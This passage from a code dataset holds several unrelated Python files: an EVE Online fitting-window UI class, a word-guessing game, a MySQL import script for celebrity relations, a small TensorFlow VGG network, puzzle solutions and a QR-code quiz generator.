eve.client.script.ui.shared.fitting.fittingController import ShipFittingController\r\nfrom eve.client.script.ui.shared.fitting.fittingUtil import GetXtraColor2, GetBaseShapeSize, PANEL_WIDTH, FONTCOLOR_DEFAULT\r\nfrom eve.client.script.ui.shared.fitting.statsPanel import StatsPanel\r\nfrom eve.client.script.ui.shared.skins.controller import FittingSkinPanelController\r\nfrom eve.client.script.ui.shared.skins.skinPanel import SkinPanel\r\nfrom eve.client.script.ui.station.fitting.fittingTooltipUtils import SetFittingTooltipInfo\r\nfrom eve.client.script.ui.station.fitting.minihangar import CargoCargoSlots, CargoDroneSlots\r\nfrom eve.common.script.sys.eveCfg import GetActiveShip\r\nfrom localization import GetByLabel\r\nimport locks\r\nimport uthread\r\nWND_HEIGHT = 560\r\nANIM_DURATION = 0.25\r\n\r\nclass 
FittingWindow2(Window):\r\n __guid__ = 'form.FittingWindow2'\r\n __notifyevents__ = ['OnSetDevice']\r\n default_topParentHeight = 0\r\n default_fixedHeight = WND_HEIGHT\r\n default_windowID = 'fitting2'\r\n default_captionLabelPath = 'Tooltips/StationServices/ShipFitting'\r\n default_descriptionLabelPath = 'Tooltips/StationServices/ShipFitting_description'\r\n default_iconNum = 'res:/ui/Texture/WindowIcons/fitting.png'\r\n\r\n def ApplyAttributes(self, attributes):\r\n Window.ApplyAttributes(self, attributes)\r\n self.MakeUnResizeable()\r\n self.HideHeaderFill()\r\n self.windowReady = False\r\n self.controller = None\r\n itemID = attributes.shipID or GetActiveShip()\r\n self._layoutLock = locks.Lock()\r\n self.controller = ShipFittingController(itemID=itemID)\r\n self.controller.on_stats_changed.connect(self.UpdateStats)\r\n self.controller.on_new_itemID.connect(self.UpdateStats)\r\n self.ConstructLayout()\r\n\r\n def ConstructLayout(self):\r\n with self._layoutLock:\r\n self.sr.main.Flush()\r\n width = PANEL_WIDTH if self.IsLeftPanelExpanded() else 0\r\n skinController = FittingSkinPanelController(fitting=self.controller)\r\n self.leftPanel = Container(parent=self.sr.main, align=uiconst.TOLEFT, width=width, padding=(10, 0, 0, 10))\r\n self.cleanShipBtn = CleanShipButton(parent=self.leftPanel, align=uiconst.TOBOTTOM, controller=self.controller)\r\n self.skinPanel = SkinPanel(parent=self.leftPanel, align=uiconst.TOALL, controller=skinController, settingsPrefix='Fitting_SkinPanel', logContext='FittingWindow')\r\n if self.IsLeftPanelExpanded():\r\n uthread.new(self.skinPanel.Load)\r\n width = PANEL_WIDTH if self.IsRightPanelExpanded() else 0\r\n self.rightPanel = StatsPanel(name='rightside', parent=self.sr.main, align=uiconst.TORIGHT, width=width, idx=0, padding=(0, 0, 10, 10), controller=self.controller)\r\n mainCont = Container(name='mainCont', parent=self.sr.main, top=-8)\r\n self.overlayCont = Container(name='overlayCont', parent=mainCont)\r\n self.ConstructPanelExpanderBtn()\r\n self.ConstructInventoryIcons()\r\n self.ConstructPowerAndCpuLabels()\r\n Fitting(parent=mainCont, owner=self, controller=self.controller)\r\n self.windowReady = True\r\n self.width = self.GetWindowWidth()\r\n self.SetFixedWidth(self.width)\r\n self.UpdateStats()\r\n\r\n def ConstructInventoryIcons(self):\r\n cargoDroneCont = ContainerAutoSize(name='cargoDroneCont', parent=self.overlayCont, align=uiconst.BOTTOMLEFT, width=110, left=const.defaultPadding, top=4)\r\n cargoSlot = CargoCargoSlots(name='cargoSlot', parent=cargoDroneCont, align=uiconst.TOTOP, height=32, controller=self.controller)\r\n SetFittingTooltipInfo(cargoSlot, 'CargoHold')\r\n droneSlot = CargoDroneSlots(name='cargoSlot', parent=cargoDroneCont, align=uiconst.TOTOP, height=32, controller=self.controller)\r\n SetFittingTooltipInfo(droneSlot, 'DroneBay')\r\n\r\n def IsRightPanelExpanded(self):\r\n return settings.user.ui.Get('fittingPanelRight', 1)\r\n\r\n def IsLeftPanelExpanded(self):\r\n return settings.user.ui.Get('fittingPanelLeft2', 1)\r\n\r\n def ConstructPanelExpanderBtn(self):\r\n if self.IsLeftPanelExpanded():\r\n texturePath = 'res:/UI/Texture/Icons/73_16_196.png'\r\n tooltipName = 'CollapseSidePane'\r\n else:\r\n texturePath = 'res:/UI/Texture/Icons/73_16_195.png'\r\n tooltipName = 'ExpandSidePane'\r\n self.toggleLeftBtn = ButtonIcon(texturePath=texturePath, parent=self.overlayCont, align=uiconst.CENTERLEFT, pos=(2, 0, 16, 16), func=self.ToggleLeftPanel)\r\n SetFittingTooltipInfo(self.toggleLeftBtn, tooltipName=tooltipName, 
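# tooltipName above was chosen to match the panel's current expand/collapse state\r\n            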
includeDesc=False)\r\n if self.IsRightPanelExpanded():\r\n texturePath = 'res:/UI/Texture/Icons/73_16_195.png'\r\n tooltipName = 'CollapseSidePane'\r\n else:\r\n texturePath = 'res:/UI/Texture/Icons/73_16_196.png'\r\n tooltipName = 'ExpandSidePane'\r\n self.toggleRightBtn = ButtonIcon(texturePath=texturePath, parent=self.overlayCont, align=uiconst.CENTERRIGHT, pos=(2, 0, 16, 16), func=self.ToggleRight)\r\n SetFittingTooltipInfo(self.toggleRightBtn, tooltipName=tooltipName, includeDesc=False)\r\n\r\n def ToggleRight(self, *args):\r\n isExpanded = not self.IsRightPanelExpanded()\r\n settings.user.ui.Set('fittingPanelRight', isExpanded)\r\n self._fixedWidth = self.GetWindowWidth()\r\n self.toggleRightBtn.state = uiconst.UI_DISABLED\r\n if isExpanded:\r\n self.toggleRightBtn.SetTexturePath('res:/UI/Texture/Icons/73_16_195.png')\r\n self.toggleRightBtn.tooltipPanelClassInfo.headerText = GetByLabel('Tooltips/FittingWindow/CollapseSidePane')\r\n uicore.animations.MorphScalar(self, 'width', self.width, self._fixedWidth, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self.rightPanel, 'width', self.rightPanel.width, PANEL_WIDTH, duration=ANIM_DURATION)\r\n uicore.animations.FadeTo(self.rightPanel, self.rightPanel.opacity, 1.0, duration=ANIM_DURATION, sleep=True)\r\n else:\r\n self.toggleRightBtn.SetTexturePath('res:/UI/Texture/Icons/73_16_196.png')\r\n self.toggleRightBtn.tooltipPanelClassInfo.headerText = GetByLabel('Tooltips/FittingWindow/ExpandSidePane')\r\n uicore.animations.MorphScalar(self, 'width', self.width, self._fixedWidth, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self.rightPanel, 'width', self.rightPanel.width, 0, duration=ANIM_DURATION)\r\n uicore.animations.FadeTo(self.rightPanel, self.rightPanel.opacity, 0.0, duration=ANIM_DURATION, sleep=True)\r\n self.toggleRightBtn.state = uiconst.UI_NORMAL\r\n\r\n def ToggleLeftPanel(self, *args):\r\n isExpanded = not self.IsLeftPanelExpanded()\r\n settings.user.ui.Set('fittingPanelLeft2', isExpanded)\r\n self._fixedWidth = self.GetWindowWidth()\r\n self.toggleLeftBtn.state = uiconst.UI_DISABLED\r\n if isExpanded:\r\n self.toggleLeftBtn.SetTexturePath('res:/UI/Texture/Icons/73_16_196.png')\r\n self.toggleLeftBtn.tooltipPanelClassInfo.headerText = GetByLabel('Tooltips/FittingWindow/CollapseSidePane')\r\n uicore.animations.MorphScalar(self, 'width', self.width, self._fixedWidth, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self, 'left', self.left, self.left - PANEL_WIDTH, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self.leftPanel, 'width', self.leftPanel.width, PANEL_WIDTH, duration=ANIM_DURATION)\r\n uicore.animations.FadeTo(self.leftPanel, self.leftPanel.opacity, 1.0, duration=ANIM_DURATION, sleep=True)\r\n uthread.new(self.skinPanel.Load)\r\n else:\r\n self.toggleLeftBtn.SetTexturePath('res:/UI/Texture/Icons/73_16_195.png')\r\n self.toggleLeftBtn.tooltipPanelClassInfo.headerText = GetByLabel('Tooltips/FittingWindow/ExpandSidePane')\r\n uicore.animations.MorphScalar(self, 'width', self.width, self._fixedWidth, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self, 'left', self.left, self.left + PANEL_WIDTH, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self.leftPanel, 'width', self.leftPanel.width, 0, duration=ANIM_DURATION)\r\n uicore.animations.FadeTo(self.leftPanel, self.leftPanel.opacity, 0.0, duration=ANIM_DURATION, sleep=True)\r\n self.toggleLeftBtn.state = uiconst.UI_NORMAL\r\n\r\n def GetWindowWidth(self):\r\n width = GetBaseShapeSize() + 16\r\n if 
self.IsLeftPanelExpanded():\r\n width += PANEL_WIDTH\r\n if self.IsRightPanelExpanded():\r\n width += PANEL_WIDTH\r\n return width\r\n\r\n def OnSetDevice(self):\r\n if self.controller and self.controller.GetItemID():\r\n uthread.new(self.ConstructLayout)\r\n\r\n def InitializeStatesAndPosition(self, *args, **kw):\r\n current = self.GetRegisteredPositionAndSize()\r\n default = self.GetDefaultSizeAndPosition()\r\n fixedHeight = self._fixedHeight\r\n fixedWidth = self.GetWindowWidth()\r\n Window.InitializeStatesAndPosition(self, *args, **kw)\r\n if fixedWidth is not None:\r\n self.width = fixedWidth\r\n self._fixedWidth = fixedWidth\r\n if fixedHeight is not None:\r\n self.height = fixedHeight\r\n self._fixedHeight = fixedHeight\r\n if list(default) == list(current)[:4]:\r\n settings.user.ui.Set('defaultFittingPosition', 1)\r\n dw = uicore.desktop.width\r\n dh = uicore.desktop.height\r\n self.left = (dw - self.width) / 2\r\n self.top = (dh - self.height) / 2\r\n self.MakeUnpinable()\r\n self.Unlock()\r\n uthread.new(uicore.registry.SetFocus, self)\r\n self._collapseable = 0\r\n\r\n def _OnClose(self, *args):\r\n settings.user.ui.Set('defaultFittingPosition', 0)\r\n\r\n def MouseDown(self, *args):\r\n uthread.new(uicore.registry.SetFocus, self)\r\n SetOrder(self, 0)\r\n\r\n def GhostFitItem(self, ghostItem = None):\r\n if not self.controller:\r\n return\r\n uthread.new(self.controller.SetGhostFittedItem, ghostItem)\r\n\r\n def OnStartMinimize_(self, *args):\r\n sm.ChainEvent('ProcessFittingWindowStartMinimize')\r\n\r\n def OnEndMinimize_(self, *args):\r\n sm.ChainEvent('ProcessFittingWindowEndMinimize')\r\n\r\n def OnUIScalingChange(self, *args):\r\n pass\r\n\r\n def UpdateStats(self):\r\n if not self.windowReady:\r\n return\r\n self.UpdateCPU()\r\n self.UpdatePower()\r\n self.UpdateCalibration()\r\n\r\n def ConstructPowerAndCpuLabels(self):\r\n powerGridAndCpuCont = LayoutGrid(parent=self.overlayCont, columns=1, state=uiconst.UI_PICKCHILDREN, align=uiconst.BOTTOMRIGHT, top=10, left=10)\r\n cpu_statustextHeader = EveLabelMediumBold(text=GetByLabel('UI/Fitting/FittingWindow/CPUStatusHeader'), name='cpu_statustextHeader', state=uiconst.UI_NORMAL, align=uiconst.TOPRIGHT)\r\n SetFittingTooltipInfo(targetObject=cpu_statustextHeader, tooltipName='CPU')\r\n powerGridAndCpuCont.AddCell(cpu_statustextHeader)\r\n self.cpu_statustext = EveLabelMedium(text='', name='cpu_statustext', state=uiconst.UI_NORMAL, align=uiconst.TOPRIGHT)\r\n SetFittingTooltipInfo(targetObject=self.cpu_statustext, tooltipName='CPU')\r\n powerGridAndCpuCont.AddCell(self.cpu_statustext)\r\n powerGridAndCpuCont.AddCell(cellObject=Container(name='spacer', align=uiconst.TOTOP, height=10))\r\n power_statustextHeader = EveLabelMediumBold(text=GetByLabel('UI/Fitting/FittingWindow/PowergridHeader'), name='power_statustextHeader', state=uiconst.UI_NORMAL, align=uiconst.TOPRIGHT)\r\n SetFittingTooltipInfo(targetObject=power_statustextHeader, tooltipName='PowerGrid')\r\n powerGridAndCpuCont.AddCell(power_statustextHeader)\r\n self.power_statustext = EveLabelMedium(text='', name='power_statustext', state=uiconst.UI_NORMAL, align=uiconst.TOPRIGHT)\r\n powerGridAndCpuCont.AddCell(self.power_statustext)\r\n SetFittingTooltipInfo(targetObject=self.power_statustext, tooltipName='PowerGrid')\r\n self.calibration_statustext = EveLabelMedium(text='', parent=self.overlayCont, name='calibrationstatustext', pos=(8, 50, 0, 0), idx=0, state=uiconst.UI_NORMAL)\r\n SetFittingTooltipInfo(targetObject=self.calibration_statustext, 
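# same tooltip helper as the CPU and power-grid labels above\r\n            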
tooltipName='Calibration')\r\n\r\n def UpdateCPU(self):\r\n cpuLoad = self.controller.GetCPULoad()\r\n cpuOutput = self.controller.GetCPUOutput()\r\n self.cpu_statustext.text = GetByLabel('UI/Fitting/FittingWindow/CpuStatusText', cpuLoad=cpuOutput.value - cpuLoad.value, cpuOutput=cpuOutput.value, startColorTag1='' % hex(GetXtraColor2(cpuLoad.diff)), startColorTag2='' % hex(GetXtraColor2(cpuOutput.diff)), endColorTag='')\r\n\r\n def UpdatePower(self):\r\n powerLoad = self.controller.GetPowerLoad()\r\n powerOutput = self.controller.GetPowerOutput()\r\n self.power_statustext.text = GetByLabel('UI/Fitting/FittingWindow/PowerStatusText', powerLoad=powerOutput.value - powerLoad.value, powerOutput=powerOutput.value, startColorTag3='' % hex(GetXtraColor2(powerLoad.diff)), startColorTag4='' % hex(GetXtraColor2(powerOutput.diff)), endColorTag='')\r\n\r\n def UpdateCalibration(self):\r\n calibrationLoad = self.controller.GetCalibrationLoad()\r\n calibrationOutput = self.controller.GetCalibrationOutput()\r\n self.calibration_statustext.text = GetByLabel('UI/Fitting/FittingWindow/CalibrationStatusText', calibrationLoad=calibrationOutput.value - calibrationLoad.value, calibrationOutput=calibrationOutput.value, startColorTag1='' % hex(GetXtraColor2(calibrationLoad.diff)), startColorTag2='' % FONTCOLOR_DEFAULT, endColorTag='')\r\n\r\n def Close(self, setClosed = False, *args, **kwds):\r\n Window.Close(self, setClosed, *args, **kwds)\r\n self.controller.Close()\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/shared/fitting/fittingWnd.py","file_name":"fittingWnd.py","file_ext":"py","file_size_in_byte":14771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25248217551","text":"import random\nfrom SecretWord import SecretWord\n\nclass WordGuess: \n\n def __init__(self, wordDic):\n self.words_dict = wordDic\n self.guess_words = [] #constructor,initiation\n self.guesses = 0\n self.random_word = ''\n self.current_guess = ''\n\n def play(self):\n \"\"\" Plays out a single full game of Word Guess \"\"\" #play game\n self.random_word = self.chooseSecretWord() #choose random word\n print('A secret word has been randomly chosen!') \n acontainer = SecretWord() #container(instance) to hold random word\n sorted_container = SecretWord() #sorted container or instance\n acontainer.setWord(self.random_word) #make linked list \n sorted_container.setWord(self.random_word) # '' ''\n string1 = str(acontainer) #str of original random word\n string2 = sorted_container.sort()\n string2 = str(sorted_container) #str of sorted word\n find_distance = self.editDistance(string1,string2,len(string1),len(string2)) #find edit distance\n alloted_guesses = 2*find_distance #find the alloted number of guesse (*2)\n if alloted_guesses < 5:\n alloted_guesses = 5\n elif alloted_guesses > 15:\n alloted_guesses = 15 \n self.guesses = int(alloted_guesses)\n while self.guesses > 0 and acontainer.isSolved() == False:\n print('You have %d guesses remaining' % (self.guesses)) #if user hasnt guessed it yet loop\n acontainer.printProgress() #print progress\n self.getGuess() #get guess\n acontainer.update(self.current_guess) #update\n if self.current_guess not in string1 and self.current_guess != '*': #if wrong guess\n self.guesses = self.guesses - 1 #deduct\n if self.guesses > 0 and acontainer.isSolved() == True: #if successfully solved\n print('You solved the puzzle!')\n print('The secret word was: %s ' % (str(acontainer)))\n elif self.guesses == 0: #if 
failed\n print('You have run out of guesses\\nGame Over')\n print('The secret word was: %s ' % (str(acontainer)))\n self.guess_words = []\n self.guesses = 0 #reset\n self.random_word = ''\n self.current_guess = ''\n \n \n\n def chooseSecretWord(self):\n \"\"\" Chooses the secret word that will be guessed \"\"\" #choose a random word from the dict\n item = random.choice(list(self.words_dict))\n return str(item ) \n\n def editDistance(self, s1, s2,length1,length2): # edit distance with length1 of string1 and length2 of string 2 ,for later recursion\n \"\"\" Recursively returns the total number of insertions and deletions required to convert S1 into S2 \"\"\" \n if length1 == 0: #if first string is empty,return second string value since its being totally transferred\n return length2\n\n if length2 == 0: #vice versa\n return length1\n \n \n if s1[length1-1]==s2[length2-1]: \n return self.editDistance(s1,s2,length1-1,length2-1) \n \n \n #recursively find the distance for eahc operation and find the minimum\n return 1 + min(self.editDistance(s1, s2, length1, length2-1), # Insert \n self.editDistance(s1, s2, length1-1, length2)) # Remove \n \n \n \n\n def getGuess(self): \n \"\"\" Queries the user to guess a character in the secret word \"\"\"\n ask = True #ask loop\n while ask: \n user_input = input('Enter a character that has not been guessed or * for a hint: ')\n self.current_guess = str(user_input)\n if user_input == '*': #if asked for hint\n hint = self.words_dict[self.random_word]\n print('Hint: %s' % (hint)) #show hint and deduct 1\n self.guesses = self.guesses - 1\n ask = False\n elif self.current_guess not in self.guess_words: #if guess is not repeated\n self.guess_words.append(self.current_guess) #add to guesses list\n ask = False\n elif user_input in self.guess_words: #if guess is repeated\n print('Invalid guess. 
You have already guessed this letter.')\n ","repo_name":"Faiyaz42/Resume-Projects-OLD","sub_path":"Hangman/WordGuess.py","file_name":"WordGuess.py","file_ext":"py","file_size_in_byte":5378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21850153145","text":"import pymysql\nimport pandas as pd\nimport time\n\ndb = pymysql.connect(host='localhost',user='root',passwd='root')\ncursor = db.cursor()\n#创建数据库\ncursor.execute(\"create database if not exists star_relation;\")\ncursor.execute(\"use star_relation;\")\n\ndef is_valid_date(strdate):\n '''判断是否是一个有效的日期字符串'''\n try:\n time.strptime(strdate, \"%Y-%m-%d\")\n return True\n except:\n return False\n\n# 创建明星表\nsql_create_star = \"\"\"create table if not exists 明星(\n id int not null primary key auto_increment,\n name varchar(255),\n image varchar(255),\n homeland varchar(255) default null, \n weight varchar(255) default null,\n birth date default null,\n baike_url varchar(255)\n );\"\"\"\ncursor.execute(sql_create_star)\n# 写入明星数据\nstars = pd.read_csv('./data/data/star_infos_new2.csv')\nfor _,curr_star in stars.iterrows():\n if is_valid_date(curr_star['birth']):\n sql_insert_star = \"insert into 明星(name, image, homeland, weight, birth, baike_url) VALUE ('{}','{}','{}','{}','{}','{}')\".format(curr_star['name'],curr_star['image'],curr_star['homeland'],curr_star['weight'],curr_star['birth'],curr_star['baike_url'])\n else:\n sql_insert_star = \"insert into 明星(name, image, homeland, weight, baike_url) VALUE ('{}','{}','{}','{}','{}')\".format(curr_star['name'],curr_star['image'],curr_star['homeland'],curr_star['weight'],curr_star['baike_url'])\n # print(sql_insert_star)\n cursor.execute(sql_insert_star)\n\n# 创建不同关系表\nstar_relations = pd.read_csv('./data/data/all_star_relations.csv')\nrelations = star_relations['relation'].unique()\nrelations\nfor relation in relations:\n sql_create_relation = \"\"\"create table if not exists {}(\n id int not null primary key auto_increment,\n star_subject_id int references star(id),\n star_object_id int references star(id)\n );\"\"\".format(relation)\n cursor.execute(sql_create_relation)\n curr_star_relations = star_relations.loc[star_relations['relation'] == relation]\n # 写入当前关系数据\n for _,curr_star_relation in curr_star_relations.iterrows():\n cursor.execute('select id from 明星 where name = \"{}\"'.format(curr_star_relation['subject']))\n star_subject_id = cursor.fetchone()[0]\n cursor.execute('select id from 明星 where name = \"{}\"'.format(curr_star_relation['object']))\n star_object_id = cursor.fetchone()[0]\n sql_insert_relation = 'insert into {}(star_subject_id,star_object_id) value ({},{})'.format(relation,str(star_subject_id),str(star_object_id))\n cursor.execute(sql_insert_relation)\n\ndb.commit()\ndb.close()\nprint('End================================')\n\n","repo_name":"lxmliu2002/Practice_and_Training","sub_path":"submit/Week 2/mysql/star_relations_mysql.py","file_name":"star_relations_mysql.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37516271899","text":"N = int(input())\ns = input().split()\ns = list(map(int, s))\nx = set()\ny = set()\n\nfor z in s:\n\n if z in x:\n y.add(z)\n else:\n x.add(z)\nprint(sum(x) - sum(y))\n","repo_name":"SupremeSadat/HackerRank","sub_path":"Python Solutions/Sets/The Captain's Room.py","file_name":"The Captain's 
Room.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41567116086","text":"import qrcode\nimport pickle\nimport random\n\nclass ImageSample:\n def __init__(self, img_sample, wrong_authors, cur_score):\n self.title = img_sample['title']\n self.year = img_sample['year']\n authors = []\n authors.append(img_sample['creator'])\n for wrong_author in wrong_authors:\n authors.append(wrong_author)\n random.shuffle(authors)\n self.correct_id = authors.index(img_sample['creator'])\n self.authors = authors[:self.correct_id] + authors[self.correct_id:]\n self.picture_uri = img_sample['site']\n self.img_link = img_sample['uri']\n self.cur_score = cur_score\n \n def get_qr_code_image(self):\n return qrcode.make(self.picture_uri)\n\n\nclass SampleGenerator:\n def __init__(self):\n self.image_data = pickle.load(open('data/new_images.pickle', 'rb'))\n self.authors = frozenset([x['creator'] for x in self.image_data])\n \n def get_random_sample(self, cur_score=0):\n img_id = random.randint(0, len(self.image_data) - 1)\n wrong_authors = random.sample(self.authors - frozenset([self.image_data[img_id]['creator']]), 2)\n return ImageSample(self.image_data[img_id], wrong_authors, cur_score)\n\n# gen = SampleGenerator()\n# sample = gen.get_random_sample()\n\n","repo_name":"Alpus/jcd","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72429256165","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom nets import selu\nimport scipy.io as sio\nslim = tf.contrib.slim\n\ndef vgg16_small_arg_scope(weight_decay=0.0005):\n with slim.arg_scope([slim.conv2d],\n weights_initializer=tf.contrib.layers.variance_scaling_initializer(),\n biases_initializer=tf.zeros_initializer(),\n weights_regularizer=slim.l2_regularizer(weight_decay)) as arg_sc:\n return arg_sc\n\ndef vgg16_small(image, is_training=False, val = False, lr = None, prediction_fn=slim.softmax,scope='vgg13_std'):\n with tf.variable_scope(scope, 'vgg16_std', [image]):\n# layer = sio.loadmat('/home/dmsl/nas/share/personal_lsh/training/cifar100/vanila/vgg6/highest.mat')\n with tf.variable_scope('block0'):\n ff = slim.conv2d(image, 64, [3, 3], 1, padding = 'VALID', activation_fn=tf.nn.relu,\n scope='conv0', trainable=is_training, reuse=val) \n ff = slim.max_pool2d(ff, [3, 3], 2, scope='pool')\n with tf.variable_scope('block1'):\n conv = slim.conv2d(ff, 128, [3, 3], 1, padding = 'VALID', activation_fn=tf.nn.relu,\n scope='conv0', trainable=is_training, reuse=val)\n conv = slim.max_pool2d(conv, [3, 3], 2, scope='pool')\n with tf.variable_scope('block2'):\n conv = slim.conv2d(conv, 256, [3, 3], 1, padding = 'VALID', activation_fn=tf.nn.relu,\n scope='conv0', trainable=is_training, reuse=val)\n# conv = slim.max_pool2d(conv, [2, 2], 2, scope='pool')\n with tf.variable_scope('block3'):\n conv = slim.conv2d(conv, 512, [3, 3], 1, padding = 'VALID', activation_fn=tf.nn.relu,\n scope='conv0', trainable=is_training, reuse=val)\n# conv = slim.max_pool2d(conv, [2, 2], 2, scope='pool')\n\n conv = tf.contrib.layers.flatten(conv)\n fc1 = slim.fully_connected(conv, 1024, activation_fn=tf.nn.relu,\n# weights_initializer =tf.constant_initializer(layer['fc1w']),\n# biases_initializer =tf.constant_initializer(layer['fc1b']),\n 
trainable=is_training, scope = 'full1', reuse = val)\n fc = slim.dropout(fc1,0.5,is_training=is_training)\n logits = slim.fully_connected(fc, 100, activation_fn=None,\n# weights_initializer =tf.constant_initializer(layer['fc2w']),\n# biases_initializer =tf.constant_initializer(layer['fc2b']),\n trainable=is_training, scope = 'full3', reuse = val)\n \n \n end_points = {}\n end_points['Logits'] = logits\n end_points['map'] = ff\n #end_points['Predictions'] = prediction_fn(logits, scope='Predictions')\n return end_points\nvgg16_small.default_image_size = 32\n","repo_name":"InhaDeeplearningGroup/Academic_research","sub_path":"LSH/tensorflow_slim/nets/vgg16_small.py","file_name":"vgg16_small.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"20797163235","text":"import copy\n\n\nLETTERS_CAPITAL = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\nLETTERS = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v','w', 'x', 'y', 'z']\n\n\nclass KeyFinder:\n def __init__(self, file, part2 = False):\n self.labyrinth = {}\n self.position = (0, 0)\n self.keys = {}\n self.doors = {}\n self.min_total_step = 1000000\n self.paths = {}\n self.random_walks = {}\n self.read_file(file)\n if part2:\n self.change_maze()\n self.find_all_paths()\n self.memoiz = {}\n\n def read_file(self, file):\n file1 = open(file, 'r')\n lines = file1.readlines()\n y = 0\n for line in lines:\n for x in range(len(line)):\n self.labyrinth[x, y] = line[x]\n if line[x] == \"@\":\n self.keys[line[x]] = (x, y)\n self.position = (x, y)\n self.labyrinth[x, y] = '.'\n elif line[x] in LETTERS_CAPITAL:\n self.doors[line[x]] = (x, y)\n elif line[x] in LETTERS:\n self.keys[line[x]] = (x, y)\n y += 1\n\n def find_shortest_path(self, obtained_keys: list, current_key):\n if (current_key + ''.join(obtained_keys)) in self.memoiz:\n return self.memoiz[current_key + ''.join(obtained_keys)]\n\n random_walk = self.random_walks[current_key]\n min_next_step = 100000000\n ordered_keys = []\n for key in random_walk:\n if key not in obtained_keys:\n possible_path = [element[0] for element in random_walk[key] if len(set(element[1]) - set(obtained_keys)) == 0]\n if possible_path:\n new_step = sorted(possible_path)[0]\n (next_step, next_ordered_keys) = self.find_shortest_path(sorted(set(obtained_keys).union(set(key))), key)\n step = next_step + new_step\n if step < min_next_step:\n ordered_keys = [key] + next_ordered_keys\n min_next_step = step\n\n if min_next_step == 100000000:\n min_next_step = 0\n\n self.memoiz[current_key + ''.join(obtained_keys)] = (min_next_step, ordered_keys)\n return (min_next_step, ordered_keys)\n\n def find_all_paths(self):\n for key in self.keys:\n random_walk = RandomWalk(self.labyrinth, self.keys[key])\n self.random_walks[key] = random_walk.start_random_walk()\n\n def change_maze(self):\n self.keys[\"@\"] = (self.position[0] - 1, self.position[1] + 1)\n self.keys[\"!\"] = (self.position[0] + 1, self.position[1] + 1)\n self.keys[\"?\"] = (self.position[0] + 1, self.position[1] - 1)\n self.keys[\"%\"] = (self.position[0] - 1, self.position[1] - 1)\n\n self.labyrinth[(self.position[0], self.position[1])] = \"#\"\n self.labyrinth[(self.position[0] - 1, self.position[1])] = \"#\"\n self.labyrinth[(self.position[0] + 1, self.position[1])] = \"#\"\n self.labyrinth[(self.position[0], self.position[1] 
+ 1)] = \"#\"\n self.labyrinth[(self.position[0], self.position[1] - 1)] = \"#\"\n\n def find_shortest_path_part2(self, obtained_keys: list, current_keys: list):\n if (''.join(current_keys) + ''.join(obtained_keys)) in self.memoiz:\n return self.memoiz[''.join(current_keys) + ''.join(obtained_keys)]\n\n min_next_step = 100000000\n ordered_keys = []\n for i in range(4):\n current_key = current_keys[i]\n random_walk = self.random_walks[current_key]\n for key in random_walk:\n if key not in obtained_keys:\n possible_path = [element[0] for element in random_walk[key] if len(set(element[1]) - set(obtained_keys)) == 0]\n if possible_path:\n new_step = sorted(possible_path)[0]\n next_keys = copy.deepcopy(current_keys)\n next_keys[i] = key\n (next_step, next_ordered_keys) = self.find_shortest_path_part2(sorted(set(obtained_keys).union(set(key))), next_keys)\n step = next_step + new_step\n if step < min_next_step:\n ordered_keys = [key] + next_ordered_keys\n min_next_step = step\n\n if min_next_step == 100000000:\n min_next_step = 0\n\n self.memoiz[''.join(current_keys) + ''.join(obtained_keys)] = (min_next_step, ordered_keys)\n return (min_next_step, ordered_keys)\n\n\nclass RandomWalk:\n def __init__(self, labyrinth, position_initiale):\n self.labyrinth = labyrinth\n self.position_initiale = position_initiale\n self.step_to_key = {}\n\n def random_walk(self, position, steps, already_visited, doors):\n directions = [(position[0] + 1, position[1]), (position[0] - 1, position[1]),\n (position[0], position[1] + 1), (position[0], position[1] - 1)]\n for dir in directions:\n new_doors = copy.deepcopy(doors)\n if dir not in already_visited and self.labyrinth[dir] != \"#\":\n if self.labyrinth[dir] in LETTERS_CAPITAL:\n new_doors.add(self.labyrinth[dir].lower())\n elif self.labyrinth[dir] in LETTERS:\n if self.labyrinth[dir] in self.step_to_key:\n self.step_to_key[self.labyrinth[dir]].append((steps+1, new_doors))\n else:\n self.step_to_key[self.labyrinth[dir]] = [(steps+1, new_doors)]\n already_visited[dir] = 1\n position = dir\n self.random_walk(position, steps + 1, already_visited, new_doors)\n already_visited.pop(dir, None)\n\n def start_random_walk(self):\n self.random_walk(self.position_initiale, 0, {self.position_initiale: 1}, set())\n return self.step_to_key\n\n\nif __name__ == \"__main__\":\n # Part 1\n finder = KeyFinder(\"../data/2019/day18.txt\")\n x = finder.find_shortest_path(set(), \"@\")\n print(x)\n\n # Part 2\n finder = KeyFinder(\"../data/2019/day18.txt\", True)\n x = finder.find_shortest_path_part2(set(), [\"@\", \"!\", \"?\", \"%\"])\n print(x)","repo_name":"cavan26/advent-of-code","sub_path":"archive/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3048279696","text":"import pygame\nimport math\nfrom GameSetting import *\nfrom GameObjects import 